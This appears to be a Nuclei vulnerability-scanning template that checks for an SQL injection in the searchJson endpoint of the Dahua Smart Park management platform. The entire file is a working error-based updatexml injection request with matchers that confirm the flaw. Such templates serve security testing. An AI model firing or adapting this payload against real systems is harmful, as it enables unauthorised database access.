id: dahua-smart-park-searchJson-sql

info:
  name: 大华智慧园区综合管理平台searchJson-sql注入
  author: H0nayuzu
  severity: high
  description: |
    大华智慧园区综合管理平台searchJson-sql注入
  tags: sqli

http:
  - raw:
      - |
        GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-Requested-With: XMLHttpRequest
        Content-Type: application/json; charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500

      - type: word
        part: body
        words:
          - "1e469dbcb9211897b5f5ebf866c66f3"


